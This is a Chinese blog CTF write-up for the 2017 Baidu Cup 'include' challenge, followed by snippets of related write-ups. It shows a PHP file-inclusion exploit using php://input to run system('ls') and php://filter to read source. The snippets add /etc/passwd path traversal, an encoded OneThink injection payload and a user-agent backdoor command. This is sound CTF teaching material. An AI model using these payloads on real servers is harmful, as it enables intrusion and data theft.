ctf-wp-百度杯CTF比赛 2017 二月场 include

最新推荐文章于 2023-04-04 22:29:12 发布

原创最新推荐文章于 2023-04-04 22:29:12 发布 · 1.2k 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#ctf #writeup #百度杯 #include

ctf-wp 专栏收录该内容

12 篇文章

订阅专栏

本文介绍了一种通过利用文件包含漏洞来获取敏感信息的方法。通过构造特定的URL参数，可以触发服务器上的文件包含功能，进而读取任意文件内容。具体操作包括使用allow_url_include选项和php://input流，结合POST参数和php://filter协议来读取并解码目标文件。

考察文件包含
打开题目：发现 allow_url_include on
在这里插入图片描述
直接构造?path=php://input
post参数<?php echo system('ls');?>列出文件名看看：

发现有个奇怪的文件：dle345aae.php
查看此文件内容：使用php://filter协议查看曝露出来的文件的内容，因为PHP文件不能直接显示内容所以先base64显示出来，然后再解码。
构造语句:

?path=php://filter/read=convert.base64-encode/resource=dle345aae.php

在这里插入图片描述
解码：

bingo

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

zc01@

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

“百度杯”CTF比赛 2017 二月场--Zone

Oavinci的博客

05-17

777

提示未登录 BP抓包修改login=1，成功登录点击manage抓包，修改login=1，返回包中发现有个302页面跳转尝试访问系统配置文件 GET /manages/admin.php?module=/etc/passwd&name= 无回显 GET /manages/admin.php?module=../../../etc/passwd&name= 无回显怀疑过滤了../ 尝试用..././ GET /manages/admin.php?modul...

“百度杯”CTF比赛 2017 二月场 Zone

feng的博客

09-12

874

这是涉及burp抓包，文件包含或者文件读取，目录遍历，和nginx的配置文件的一个题目。

参与评论您还未登录，请先登录后发表或查看评论

百度杯”CTF比赛 2017 二月场没错！就是文件包含漏洞。

weixin_30586085的博客

03-27

339

题目源码: 文件包含漏洞的话，看一下你么可以使用php://input 伪协议，执行代码（参考了大佬WP）这里使用了POSTMAN，目录下还有一个dle345aae.php文件，呢么用cat命令打开，并且输出文件内容（反单引号在linux中表示命令）还有一种方法是用php://filter(php伪协议，作为中间流可以读取)直接读取dle3456aae.php...

---“百度杯”CTF比赛 2017 二月场---------------include

qq_43182466的博客

04-26

369

ctrl+f查找allow_url_include ![在这里插入图片描述](https://img-blog.csdnimg.cn/20190426220537866.png 可以构造?path=php://input 发现有个奇怪的文件名，访问它<?php echo 'cat dle345aae.php'?>出不来，但是看writeup上上条语句可以得到flag ...

“百度杯”CTF比赛 2017 二月场_onthink

a173262565的博客

04-07

352

题目在i春秋ctf训练营中能找到，这题直接拿大佬的wp来充数百度找到onethinnk的一个漏洞。参考：http://www.hackdig.com/06/hack-36510.htm 就是注册个账号为： %250a%24a%3d%24_GET%5ba%5d%3b%2f%2f%250aecho+%60%24a%60%3b%2f%2f的账号，但因为账号...

“百度杯”CTF比赛2017年2月场WP--web

Oavinci的博客

06-02

1096

一、爆破-1 在php语言中，所有的已经定义的变量都会保存在GLOBALS全局数组中，比方说你定义了一个$name="李华"，那么$GLOBALS['name']就等于“李华”。就是说，你可以通过这个全局数组来访问任何一个变量，所有已经定义过的变量都可以在里面通过变量名索引得到。 preg_match函数返回值为匹配到的次数。审计代码可以知道，我们可以用GET传值方式?hello=...

百度杯2017二月-Zone

r00tnb的博客

07-26

1587

前言这道题是我看了官方writeup才做出来的，最后是因为Nginx配置不当导致的漏洞，没错触及到了知识盲区，记录下来。分析点开题目链接，提示我必须登录。然后我习惯性的拿出burpsuite来抓包，发现Cookie字段中出现了可疑的login=0，于是改为1发送过去，就好啦。 HTTP/1.1 200 OK Server: nginx/1.10.2 Date: Wed, 03...

2021CTF鹤城杯挑战赛WEB-wp

qq_36410265的博客

12-27

2485

2021CTF鹤城杯挑战赛WEB部分wp

“百度杯” CTF比赛九月场 Web-Login

qq_34106499的博客

01-17

813

1. 审查源码需要仔细认真； 2. 抓包查看请求头和响应头，关注陌生属性； 3. php中反序列化的应用; 4.base64编码的使用 5. gzcompress()压缩及gzuncompress()解压的应用。

青少年CTF训练平台-WEB-部分wp

SwBack的博客

04-04

3464

扫描发现备份文件打开发现flag直接上传,然后获取flag木马地址,通过扫描目录发现。直接添加请求头user-agentt: zerodiumsystem(‘cat /flag’);连接之后,查找具有权限的命令根据提示直接发现flag 提示说明没有中文但是仍然错误,查看shadow,通过john破解密码用户名后有$y，则表明密码已使用 yescrypt 进行哈希处理指定format参数新手的登录使用提示的user账号登录之后抓包修改cookie为admin。发包，得到flag访问之后直接查看js

百度杯CTF比赛二月第三场比赛(Reverse专题赛)的CrackMe-1题目

03-30

百度杯CTF比赛二月第三场比赛(Reverse专题赛)的CrackMe-1题目。

百度杯”CTF比赛 2017 二月场 Zone

u011250160的博客

04-06

316

使用dirseatch扫描敏感目录绕过登录返回的页面中有个Manage 访问Manage 发现返回中有admin.php?module=index&name=php 访问 /manages/admin.php?module=index&name=php /manages/admin.php?module=in../dex&name=php 它俩返回的页面是一样的说明过滤了../ 使用..././绕过发现访问nginx的配置文件发现：include sites-e

i春秋 “百度杯”CTF比赛 2017 二月场 Web writeup

Senimo

03-28

1485

i春秋 “百度杯”CTF比赛 2017 二月场 Web writeup爆破-1爆破-2爆破-3includeZoneOneThink 爆破-1 分值：10分类型：MiscWeb 题目内容：flag就在某六位变量中。启动靶机，打开题目：进入页面为一段源码，分析代码：包含flag.php文件需要传入变量hello的值正则表达式匹配：一个或多个[A-Za-z0-9_] var_dump(...

[Reverse] - 百度杯”CTF比赛 2017 二月场-CrackMe-1

123

08-17

1606

环境：Windows XP 工具： IDA OD EXEINFOPE 0x00 查壳 0x01 分析拖入OD，字符串查找看一看。跟进去看就可以知道关键call了 0040196A . 48 dec eax 0040196B . 0F85 C4000000 jnz CrackMe1.00401A35 00401971 . B8...

“百度杯”CTF比赛 2017 二月场文件包含漏洞 writeup

u011250160的博客

09-24

328

1：利用php://input协议查看当前目录下的文件 2：利用php://filter/read=convert.base64-encode/resource=dle345aae.php查看dle345aae.php文件的内容 3：base64解码得到flag

“百度杯”CTF比赛 2017 二月场--web 爆破-2 writeup

会下雪的晴天

06-14

647

题目描述解题思路点击链接得到以下代码： <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); 尝试将hello变为全局变量（GOLBALS）在URL后加?hello=$GOLBALS 结果：得到FLAG 由第一步可知，flag不在...

“百度杯”CTF比赛 2017 二月场——Web-爆破-3

大方子

08-27

774

================================== 个人收获: 1.php中MD5()计算数组会返回null如果用==0则为真 ================================== 题目: 主要是代码审计，大家可以自己百度下都能看得懂的，这里我就直说关键的部分关键部分代码在这 if($_SESSION['whoami'...

“百度杯”CTF比赛 2017 二月场 include

SPS98

11-05

711

题目说的很明确, 直接告诉说是文件包含漏洞, 看了下分值感觉应该没有什么套路

“百度杯”CTF比赛 2017 二月场 wp

qq_61768489的博客

04-04

1630

目录爆破-1 爆破-2 爆破-3 include Zone OneThink misc 2 上古神器爆破-1 flag在一个长度为6的变量里面 <?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?> $$a ,.